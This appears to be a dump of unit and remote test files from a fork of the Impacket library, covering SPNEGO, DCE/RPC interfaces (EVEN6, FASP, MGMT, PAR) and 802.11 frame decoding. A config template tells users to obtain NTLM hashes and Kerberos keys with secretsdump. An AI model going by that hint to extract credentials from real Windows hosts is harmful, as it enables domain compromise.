49 | token = smb.SPNEGO_NegTokenResp()
50 | token.fromString(self.negTokenResp3)
51 | self.assertEqual(self.negTokenResp3, token.getData())
52 |
53 | def test_negTokenResp4(self):
54 | token = smb.SPNEGO_NegTokenResp()
55 | token['NegState'] = b'\x03' # request-mic
56 | token['SupportedMech'] = smb.TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
57 | self.assertEqual(self.negTokenResp4, token.getData())
58 |
59 |
60 | if __name__ == "__main__":
61 | unittest.main(verbosity=1)
62 |
--------------------------------------------------------------------------------
/impacket/tests/conftest.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Copyright (C) 2023 Fortra. All rights reserved.
3 | #
4 | # This software is provided under under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 | # Tests configuration
9 | #
10 | import pytest
11 | from . import set_remote_config_file_path, set_transport_config
12 |
13 |
14 | def pytest_configure(config):
15 | """Hook that sets remote configuration file path as specified in pytest command line
16 | or ini option, and apply the configuration options to the pytest `config` object.
17 | """
18 | config_file = config.getoption("--remote-config")
19 | if not config_file:
20 | config_file = config.getini("remote-config")
21 | if config_file:
22 | set_remote_config_file_path(config_file)
23 | set_transport_config(config)
24 |
25 |
26 | def pytest_addoption(parser):
27 | """Hook that adds pytest options for configuring the remote configuration
28 | file.
29 | """
30 | parser.addoption("--remote-config", dest="remote_config", metavar="FILE",
31 | help="Configuration file for remote tests")
32 | parser.addini("remote-config", help="Configuration file for remote tests", type="pathlist")
33 |
34 |
35 | @pytest.fixture(scope="class", name="remote")
36 | def remote_config(request):
37 | """Remote Test Case configuration fixture
38 |
39 | Sets the configuration attributes in the test class for easier access.
40 | """
41 | set_transport_config(request.cls)
42 |
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v1
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v2
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v3
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v3-kirbi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v3-kirbi
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v4
--------------------------------------------------------------------------------
/impacket/tests/data/ccache-v4-kirbi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Suq3rm4n/java-impacket-gui/21096be7bc78486bb5e33fdfe46f96709b15f6b0/impacket/tests/data/ccache-v4-kirbi
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | # Description:
11 | # Base class for testing DCE/RPC Endpoints.
12 | #
13 | # Author:
14 | # @martingalloar
15 | #
16 | from tests import RemoteTestCase
17 |
18 | from impacket.dcerpc.v5 import transport, epm
19 |
20 |
21 | class DCERPCTests(RemoteTestCase):
22 |
23 | STRING_BINDING_FORMATTING = 1
24 | STRING_BINDING_MAPPER = 2
25 |
26 | TRANSFER_SYNTAX_NDR = ("8a885d04-1ceb-11c9-9fe8-08002b104860", "2.0")
27 | TRANSFER_SYNTAX_NDR64 = ("71710533-BEBA-4937-8319-B5DBEF9CCC36", "1.0")
28 |
29 | timeout = None
30 | authn = False
31 | authn_level = None
32 | iface_uuid = None
33 | protocol = None
34 | string_binding = None
35 | string_binding_formatting = STRING_BINDING_FORMATTING
36 | transfer_syntax = None
37 | machine_account = False
38 |
39 | def connect(self, string_binding=None, iface_uuid=None):
40 | """Obtains a RPC Transport and a DCE interface according to the bindings and
41 | transfer syntax specified.
42 |
43 | :return: tuple of DCE/RPC and RPC Transport objects
44 | :rtype: (DCERPC_v5, DCERPCTransport)
45 | """
46 | string_binding = string_binding or self.string_binding
47 | if not string_binding:
48 | raise NotImplemented("String binding must be defined")
49 |
50 | rpc_transport = transport.DCERPCTransportFactory(string_binding)
51 |
52 | # Set timeout if defined
53 | if self.timeout:
54 | rpc_transport.set_connect_timeout(self.timeout)
55 |
56 | # Authenticate if specified
57 | if self.authn and hasattr(rpc_transport, 'set_credentials'):
58 | # This method exists only for selected protocol sequences.
59 | rpc_transport.set_credentials(self.username, self.password, self.domain, self.lmhash, self.nthash)
60 |
61 | # Gets the DCE RPC object
62 | dce = rpc_transport.get_dce_rpc()
63 |
64 | # Set the authentication level
65 | if self.authn_level:
66 | dce.set_auth_level(self.authn_level)
67 |
68 | # Connect
69 | dce.connect()
70 |
71 | # Bind if specified
72 | iface_uuid = iface_uuid or self.iface_uuid
73 | if iface_uuid and self.transfer_syntax:
74 | dce.bind(iface_uuid, transfer_syntax=self.transfer_syntax)
75 | elif iface_uuid:
76 | dce.bind(iface_uuid)
77 |
78 | return dce, rpc_transport
79 |
80 | def setUp(self):
81 | super(DCERPCTests, self).setUp()
82 | self.set_transport_config(machine_account=self.machine_account)
83 |
84 | if self.string_binding_formatting == self.STRING_BINDING_FORMATTING:
85 | self.string_binding = self.string_binding.format(self)
86 | elif self.string_binding_formatting == self.STRING_BINDING_MAPPER:
87 | self.string_binding = epm.hept_map(self.machine, self.iface_uuid, protocol=self.protocol)
88 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_even6.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # (h)EvtRpcRegisterLogQuery
11 | # (h)EvtRpcQueryNext
12 | # Not yet
13 | # EvtRpcQuerySeek
14 | # EvtRpcClose
15 | # EvtRpcOpenLogHandle
16 | # EvtRpcGetChannelList
17 | #
18 | from __future__ import division
19 | from __future__ import print_function
20 | import pytest
21 | import unittest
22 | from six.moves import xrange
23 |
24 | from tests.dcerpc import DCERPCTests
25 |
26 | from impacket.dcerpc.v5 import even6
27 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
28 |
29 |
30 | class EVEN6Tests(DCERPCTests):
31 | iface_uuid = even6.MSRPC_UUID_EVEN6
32 | protocol = "ncacn_ip_tcp"
33 | string_binding_formatting = DCERPCTests.STRING_BINDING_MAPPER
34 | string_binding = r"ncacn_np:{0.machine}[\PIPE\eventlog]"
35 | authn = True
36 | authn_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY
37 |
38 | def test_EvtRpcRegisterLogQuery_EvtRpcQueryNext(self):
39 | dce, rpctransport = self.connect()
40 |
41 | request = even6.EvtRpcRegisterLogQuery()
42 | request['Path'] = 'Security\x00'
43 | request['Query'] = '*\x00'
44 | request['Flags'] = even6.EvtQueryChannelName | even6.EvtReadNewestToOldest
45 | request.dump()
46 |
47 | resp = dce.request(request)
48 | resp.dump()
49 | log_handle = resp['Handle']
50 |
51 | request = even6.EvtRpcQueryNext()
52 | request['LogQuery'] = log_handle
53 | request['NumRequestedRecords'] = 5
54 | request['TimeOutEnd'] = 1000
55 | request['Flags'] = 0
56 | request.dump()
57 |
58 | resp = dce.request(request)
59 | resp.dump()
60 |
61 | for i in xrange(resp['NumActualRecords']):
62 | event_offset = resp['EventDataIndices'][i]['Data']
63 | event_size = resp['EventDataSizes'][i]['Data']
64 | event = resp['ResultBuffer'][event_offset:event_offset + event_size]
65 |
66 | def test_hEvtRpcRegisterLogQuery_hEvtRpcQueryNext(self):
67 | dce, rpctransport = self.connect()
68 |
69 | resp = even6.hEvtRpcRegisterLogQuery(dce, 'Security\x00',
70 | even6.EvtQueryChannelName | even6.EvtReadNewestToOldest,
71 | '*\x00')
72 | resp.dump()
73 | log_handle = resp['Handle']
74 |
75 | resp = even6.hEvtRpcQueryNext(dce, log_handle, 5, 1000)
76 | resp.dump()
77 |
78 | for i in xrange(resp['NumActualRecords']):
79 | event_offset = resp['EventDataIndices'][i]['Data']
80 | event_size = resp['EventDataSizes'][i]['Data']
81 | event = resp['ResultBuffer'][event_offset:event_offset + event_size]
82 |
83 |
84 | @pytest.mark.remote
85 | class EVEN6TestsTCPTransport(EVEN6Tests, unittest.TestCase):
86 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
87 |
88 |
89 | @pytest.mark.remote
90 | class EVEN6TestsTCPTransport64(EVEN6Tests, unittest.TestCase):
91 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
92 |
93 |
94 | # Process command-line arguments.
95 | if __name__ == "__main__":
96 | unittest.main(verbosity=1)
97 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_fasp.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # FWOpenPolicyStore
11 | #
12 | # Not yet:
13 | #
14 | import unittest
15 | import pytest
16 | from tests.dcerpc import DCERPCTests
17 |
18 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
19 |
20 |
21 | # XXX: This is just to pass tests until we figure out what happened with the
22 | # fasp module
23 | fasp = None
24 |
25 |
26 | @pytest.mark.skip(reason="fasp module unavailable")
27 | class FASPTests(DCERPCTests):
28 | #iface_uuid = fasp.MSRPC_UUID_FASP
29 | authn = True
30 | authn_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY
31 |
32 | def test_FWOpenPolicyStore(self):
33 | dce, rpc_transport = self.connect()
34 | request = fasp.FWOpenPolicyStore()
35 | request['BinaryVersion'] = 0x0200
36 | request['StoreType'] = fasp.FW_STORE_TYPE.FW_STORE_TYPE_LOCAL
37 | request['AccessRight'] = fasp.FW_POLICY_ACCESS_RIGHT.FW_POLICY_ACCESS_RIGHT_READ
38 | request['dwFlags'] = 0
39 | resp = dce.request(request)
40 | resp.dump()
41 |
42 | def test_hFWOpenPolicyStore(self):
43 | dce, rpc_transport = self.connect()
44 | resp = fasp.hFWOpenPolicyStore(dce)
45 | resp.dump()
46 |
47 | def test_FWClosePolicyStore(self):
48 | dce, rpc_transport = self.connect()
49 | resp = fasp.hFWOpenPolicyStore(dce)
50 | request = fasp.FWClosePolicyStore()
51 | request['phPolicyStore'] = resp['phPolicyStore']
52 | resp = dce.request(request)
53 | resp.dump()
54 |
55 | def test_hFWClosePolicyStore(self):
56 | dce, rpc_transport = self.connect()
57 | resp = fasp.hFWOpenPolicyStore(dce)
58 | resp = fasp.hFWClosePolicyStore(dce,resp['phPolicyStore'])
59 | resp.dump()
60 |
61 |
62 | @pytest.mark.remote
63 | class FASPTestsTCPTransport(FASPTests, unittest.TestCase):
64 | protocol = "ncacn_ip_tcp"
65 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
66 |
67 |
68 | @pytest.mark.remote
69 | class FASPTestsTCPTransport64(FASPTests, unittest.TestCase):
70 | protocol = "ncacn_ip_tcp"
71 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
72 |
73 |
74 | # Process command-line arguments.
75 | if __name__ == "__main__":
76 | unittest.main(verbosity=1)
77 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_mgmt.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # (h)inq_if_ids
11 | # (h)inq_stats
12 | # (h)is_server_listening
13 | # (h)stop_server_listening
14 | # (h)inq_princ_name
15 | #
16 | from __future__ import division
17 | from __future__ import print_function
18 | import pytest
19 | import unittest
20 | from six import assertRaisesRegex
21 | from tests.dcerpc import DCERPCTests
22 |
23 | from impacket.dcerpc.v5 import mgmt
24 | from impacket.dcerpc.v5.rpcrt import DCERPCException
25 |
26 |
27 | class MGMTTests(DCERPCTests):
28 | iface_uuid = mgmt.MSRPC_UUID_MGMT
29 | string_binding = r"ncacn_np:{0.machine}[\pipe\epmapper]"
30 | authn = True
31 |
32 | def test_inq_if_ids(self):
33 | dce, transport = self.connect()
34 |
35 | request = mgmt.inq_if_ids()
36 | resp = dce.request(request)
37 | resp.dump()
38 | #for i in range(resp['if_id_vector']['count']):
39 | # print bin_to_uuidtup(resp['if_id_vector']['if_id'][i]['Data'].getData())
40 | # print
41 |
42 | def test_hinq_if_ids(self):
43 | dce, transport = self.connect()
44 |
45 | resp = mgmt.hinq_if_ids(dce)
46 | resp.dump()
47 |
48 | def test_inq_stats(self):
49 | dce, transport = self.connect()
50 |
51 | request = mgmt.inq_stats()
52 | request['count'] = 40
53 | resp = dce.request(request)
54 | resp.dump()
55 |
56 | def test_hinq_stats(self):
57 | dce, transport = self.connect()
58 |
59 | resp = mgmt.hinq_stats(dce)
60 | resp.dump()
61 |
62 | def test_is_server_listening(self):
63 | dce, transport = self.connect()
64 |
65 | request = mgmt.is_server_listening()
66 | resp = dce.request(request, checkError=False)
67 | resp.dump()
68 |
69 | def test_his_server_listening(self):
70 | dce, transport = self.connect()
71 |
72 | resp = mgmt.his_server_listening(dce)
73 | resp.dump()
74 |
75 | def test_stop_server_listening(self):
76 | dce, transport = self.connect()
77 |
78 | request = mgmt.stop_server_listening()
79 | with assertRaisesRegex(self, DCERPCException, "rpc_s_access_denied"):
80 | dce.request(request)
81 |
82 | def test_hstop_server_listening(self):
83 | dce, transport = self.connect()
84 |
85 | with assertRaisesRegex(self, DCERPCException, "rpc_s_access_denied"):
86 | mgmt.hstop_server_listening(dce)
87 |
88 | def test_inq_princ_name(self):
89 | dce, transport = self.connect()
90 |
91 | request = mgmt.inq_princ_name()
92 | request['authn_proto'] = 0
93 | request['princ_name_size'] = 32
94 | resp = dce.request(request, checkError=False)
95 | resp.dump()
96 |
97 | def test_hinq_princ_name(self):
98 | dce, transport = self.connect()
99 |
100 | resp = mgmt.hinq_princ_name(dce)
101 | resp.dump()
102 |
103 |
104 | @pytest.mark.remote
105 | class MGMTTestsSMBTransport(MGMTTests, unittest.TestCase):
106 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
107 |
108 |
109 | @pytest.mark.remote
110 | class MGMTTestsSMBTransport64(MGMTTests, unittest.TestCase):
111 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
112 |
113 |
114 | @pytest.mark.remote
115 | class MGMTTestsTCPTransport(MGMTTests, unittest.TestCase):
116 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
117 | string_binding = r"ncacn_ip_tcp:{0.machine}[135]"
118 |
119 |
120 | @pytest.mark.remote
121 | class MGMTTestsTCPTransport64(MGMTTests, unittest.TestCase):
122 | string_binding = r"ncacn_ip_tcp:{0.machine}[135]"
123 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
124 |
125 |
126 | # Process command-line arguments.
127 | if __name__ == "__main__":
128 | unittest.main(verbosity=1)
129 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_par.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # (h)RpcAsyncEnumPrinters
11 | # (h)RpcAsyncEnumPrinterDrivers
12 | # (h)RpcAsyncGetPrinterDriverDirectory
13 | #
14 | # Not yet:
15 | # (h)RpcAsyncOpenPrinter
16 | # (h)RpcAsyncClosePrinter
17 | # (h)RpcAsyncAddPrinterDriver
18 | # RpcAsyncAddPrinter
19 | #
20 | import pytest
21 | import unittest
22 | from six import assertRaisesRegex
23 | from tests.dcerpc import DCERPCTests
24 |
25 | from impacket.dcerpc.v5 import par
26 | from impacket.dcerpc.v5.dtypes import NULL
27 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
28 |
29 |
30 | class PARTests(DCERPCTests):
31 | iface_uuid = par.MSRPC_UUID_PAR
32 | string_binding_formatting = DCERPCTests.STRING_BINDING_MAPPER
33 | authn = True
34 | authn_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY
35 |
36 | def test_RpcAsyncEnumPrinters(self):
37 | dce, rpc_transport = self.connect()
38 | request = par.RpcAsyncEnumPrinters()
39 | request['Flags'] = 0
40 | request['Name'] = NULL
41 | request['pPrinterEnum'] = NULL
42 | request['Level'] = 0
43 | resp = dce.request(request, par.MSRPC_UUID_WINSPOOL)
44 | resp.dump()
45 |
46 | def test_hRpcAsyncEnumPrinters(self):
47 | dce, rpc_transport = self.connect()
48 | resp = par.hRpcAsyncEnumPrinters(dce, NULL)
49 | resp.dump()
50 |
51 | def test_RpcAsyncEnumPrinterDrivers(self):
52 | dce, rpc_transport = self.connect()
53 | request = par.RpcAsyncEnumPrinterDrivers()
54 | request['pName'] = NULL
55 | request['pEnvironment'] = NULL
56 | request['Level'] = 1
57 | request['pDrivers'] = NULL
58 | request['cbBuf'] = 0
59 | with assertRaisesRegex(self, par.DCERPCException, "ERROR_INSUFFICIENT_BUFFER"):
60 | dce.request(request, par.MSRPC_UUID_WINSPOOL)
61 |
62 | def test_hRpcAsyncEnumPrinterDrivers(self):
63 | dce, rpc_transport = self.connect()
64 | resp = par.hRpcAsyncEnumPrinterDrivers(dce, NULL, NULL, 1)
65 | resp.dump()
66 |
67 | def test_RpcAsyncGetPrinterDriverDirectory(self):
68 | dce, rpc_transport = self.connect()
69 | request = par.RpcAsyncGetPrinterDriverDirectory()
70 | request['pName'] = NULL
71 | request['pEnvironment'] = NULL
72 | request['Level'] = 1
73 | request['pDriverDirectory'] = NULL
74 | request['cbBuf'] = 0
75 | with assertRaisesRegex(self, par.DCERPCException, "ERROR_INSUFFICIENT_BUFFER"):
76 | dce.request(request, par.MSRPC_UUID_WINSPOOL)
77 |
78 | def test_hRpcAsyncGetPrinterDriverDirectory(self):
79 | dce, rpc_transport = self.connect()
80 | resp = par.hRpcAsyncGetPrinterDriverDirectory(dce, NULL, NULL, 1)
81 | resp.dump()
82 |
83 |
84 | @pytest.mark.remote
85 | class PARTestsTCPTransport(PARTests, unittest.TestCase):
86 | protocol = "ncacn_ip_tcp"
87 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
88 |
89 |
90 | @pytest.mark.remote
91 | class PARTestsTCPTransport64(PARTests, unittest.TestCase):
92 | protocol = "ncacn_ip_tcp"
93 | transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
94 |
95 |
96 | # Process command-line arguments.
97 | if __name__ == "__main__":
98 | unittest.main(verbosity=1)
99 |
--------------------------------------------------------------------------------
/impacket/tests/dcetests.cfg.template:
--------------------------------------------------------------------------------
1 | [global]
2 |
3 | [TCPTransport]
4 | # NetBIOS Name
5 | servername =
6 | # Targets IP
7 | machine =
8 | username =
9 | password =
10 | # NTLM Hash, you can grab it with secretsdump
11 | hashes =
12 | # Kerberos AES 256 Key, you can grab it with secretsdump
13 | aesKey256 =
14 | # Kerberos AES 128 Key, you can grab it with secretsdump
15 | aesKey128 =
16 | # It must be the domain FQDN
17 | domain =
18 | # This need to be a domain joined machine NetBIOS name
19 | machineuser =
20 | # Domain joined machine NetBIOS name hashes (grab them with secretsdump)
21 | machineuserhashes =
22 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Copyright (C) 2023 Fortra. All rights reserved.
3 | #
4 | # This software is provided under under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_Dot11Base.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11, Dot11Types
12 |
13 |
14 | class TestDot11Common(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # Frame control field
18 | a=b'\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e'
19 | self.dot11fc=Dot11(a)
20 |
21 | def test_01_HeaderSize(self):
22 | 'Test Header Size field'
23 | self.assertEqual(self.dot11fc.get_header_size(), 2)
24 |
25 | def test_01_TailSize(self):
26 | 'Test Tail Size field'
27 | self.assertEqual(self.dot11fc.get_tail_size(), 4)
28 |
29 | def test_02_Version(self):
30 | 'Test Version field'
31 | self.assertEqual(self.dot11fc.get_version(), 0)
32 | self.dot11fc.set_version(3)
33 | self.assertEqual(self.dot11fc.get_version(), 3)
34 |
35 | def test_03_Type(self):
36 | 'Test Type field'
37 | self.assertEqual(self.dot11fc.get_type(), 1)
38 | self.dot11fc.set_type(3)
39 | self.assertEqual(self.dot11fc.get_type(), 3)
40 |
41 | def test_04_SubType(self):
42 | 'Test Subtype field'
43 | self.assertEqual(self.dot11fc.get_subtype(),13)
44 | self.dot11fc.set_subtype(5)
45 | self.assertEqual(self.dot11fc.get_subtype(),5)
46 |
47 | def test_05_ToDS(self):
48 | 'Test toDS field'
49 | self.assertEqual(self.dot11fc.get_toDS(),0)
50 | self.dot11fc.set_toDS(1)
51 | self.assertEqual(self.dot11fc.get_toDS(),1)
52 |
53 | def test_06_FromDS(self):
54 | 'Test fromDS field'
55 | self.assertEqual(self.dot11fc.get_fromDS(),0)
56 | self.dot11fc.set_fromDS(1)
57 | self.assertEqual(self.dot11fc.get_fromDS(),1)
58 |
59 | def test_07_MoreFrag(self):
60 | 'Test More Frag field'
61 | self.assertEqual(self.dot11fc.get_moreFrag(),0)
62 | self.dot11fc.set_moreFrag(1)
63 | self.assertEqual(self.dot11fc.get_moreFrag(),1)
64 |
65 | def test_08_Retry(self):
66 | 'Test Retry field'
67 | self.assertEqual(self.dot11fc.get_retry(),0)
68 | self.dot11fc.set_retry(1)
69 | self.assertEqual(self.dot11fc.get_retry(),1)
70 |
71 | def test_09_PowerManagement(self):
72 | 'Test Power Management field'
73 | self.assertEqual(self.dot11fc.get_powerManagement(),0)
74 | self.dot11fc.set_powerManagement(1)
75 | self.assertEqual(self.dot11fc.get_powerManagement(),1)
76 |
77 | def test_10_MoreData(self):
78 | 'Test More Data field'
79 | self.assertEqual(self.dot11fc.get_moreData(),0)
80 | self.dot11fc.set_moreData(1)
81 | self.assertEqual(self.dot11fc.get_moreData(),1)
82 |
83 | # def test_11_WEP(self):
84 | # 'Test WEP field'
85 | # self.assertEqual(self.dot11fc.get_WEP(),0)
86 | # self.dot11fc.set_WEP(1)
87 | # self.assertEqual(self.dot11fc.get_WEP(),1)
88 |
89 |
90 | def test_12_Order(self):
91 | 'Test Order field'
92 | self.assertEqual(self.dot11fc.get_order(),0)
93 | self.dot11fc.set_order(1)
94 | self.assertEqual(self.dot11fc.get_order(),1)
95 |
96 | def test_13_latest(self):
97 | 'Test complete frame hexs'
98 | self.dot11fc.set_type_n_subtype(Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL)
99 | self.dot11fc.set_order(1)
100 | self.dot11fc.set_moreData(1)
101 | self.dot11fc.set_retry(1)
102 | self.dot11fc.set_fromDS(1)
103 |
104 | frame=self.dot11fc.get_packet()
105 |
106 | self.assertEqual(frame, b'\xa4\xaa\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e')
107 |
108 |
109 | if __name__ == '__main__':
110 | unittest.main(verbosity=1)
111 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_Dot11Decoder.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from six import PY2
12 | from impacket.ImpactDecoder import Dot11Decoder #,Dot11Types
13 |
14 |
15 | class TestDot11Decoder(unittest.TestCase):
16 |
17 | def setUp(self):
18 | self.WEPKey=None #Unknown
19 | self.WEPData=b'\x08\x41\x3a\x01\x00\x17\x3f\x44\x4f\x96\x00\x13\xce\x67\x0e\x73\x00\x17\x3f\x44\x4f\x96\xb0\x04\xeb\xcd\x8b\x00\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17\xdd\xb5\xd4\x35'
20 | dot11_decoder = Dot11Decoder()
21 | self.in0=dot11_decoder.decode(self.WEPData)
22 | self.in1=self.in0.child()
23 | self.in2=self.in1.child()
24 | self.in3=self.in2.child()
25 | if self.WEPKey:
26 | self.in4=self.in3.child()
27 | self.in5=self.in4.child()
28 |
29 | def test_01_Dot11Decoder(self):
30 | 'Test Dot11 decoder'
31 | if PY2:
32 | self.assertEqual(str(self.in0.__class__), "impacket.dot11.Dot11")
33 | else:
34 | self.assertEqual(str(self.in0.__class__), "")
35 |
36 | def test_02_Dot11DataFrameDecoder(self):
37 | 'Test Dot11DataFrame decoder'
38 | if PY2:
39 | self.assertEqual(str(self.in1.__class__), "impacket.dot11.Dot11DataFrame")
40 | else:
41 | self.assertEqual(str(self.in1.__class__), "")
42 |
43 | def test_03_Dot11WEP(self):
44 | 'Test Dot11WEP decoder'
45 | if PY2:
46 | self.assertEqual(str(self.in2.__class__), "impacket.dot11.Dot11WEP")
47 | else:
48 | self.assertEqual(str(self.in2.__class__), "")
49 |
50 | def test_04_Dot11WEPData(self):
51 | 'Test Dot11WEPData decoder'
52 |
53 | if not self.WEPKey:
54 | return
55 |
56 | self.assertEqual(str(self.in3.__class__), "impacket.dot11.Dot11WEPData")
57 |
58 | # Test if wep data "get_packet" is correct
59 | wepdata=b'\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17'
60 | self.assertEqual(self.in3.get_packet(), wepdata)
61 |
62 | def test_05_LLC(self):
63 | 'Test LLC decoder'
64 | if self.WEPKey:
65 | self.assertEqual(str(self.in4.__class__), "impacket.dot11.LLC")
66 |
67 | def test_06_Data(self):
68 | 'Test LLC Data decoder'
69 |
70 | if self.WEPKey:
71 | dataclass=self.in4.__class__
72 | else:
73 | dataclass=self.in3.__class__
74 |
75 | self.assertGreater(str(dataclass).find('ImpactPacket.Data'), 0)
76 |
77 |
78 | if __name__ == '__main__':
79 | unittest.main(verbosity=1)
80 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlACK.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameACK
12 |
13 |
14 | class TestDot11FrameControlACK(unittest.TestCase):
15 |
16 | def setUp(self):
17 | # 802.11 Control Frame ACK
18 | self.frame_orig=b'\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e'
19 |
20 | d = Dot11(self.frame_orig)
21 |
22 | type = d.get_type()
23 | self.assertEqual(type,Dot11Types.DOT11_TYPE_CONTROL)
24 |
25 | subtype = d.get_subtype()
26 | self.assertEqual(subtype,Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT)
27 |
28 | typesubtype = d.get_type_n_subtype()
29 | self.assertEqual(typesubtype,Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT)
30 |
31 | self.ack = Dot11ControlFrameACK(d.get_body_as_string())
32 |
33 | d.contains(self.ack)
34 |
35 | def test_01_HeaderTailSize(self):
36 | 'Test Header and Tail Size field'
